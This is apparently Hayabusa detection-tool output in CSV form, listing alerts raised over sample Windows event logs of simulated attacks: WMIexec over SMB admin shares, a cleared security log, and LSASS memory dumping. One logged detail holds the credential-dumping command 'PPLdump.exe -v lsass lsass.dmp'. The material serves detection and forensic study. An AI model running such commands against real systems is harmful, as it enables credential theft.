+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: 
admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: 
admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 
0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: 
\\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.360 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" -2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: 
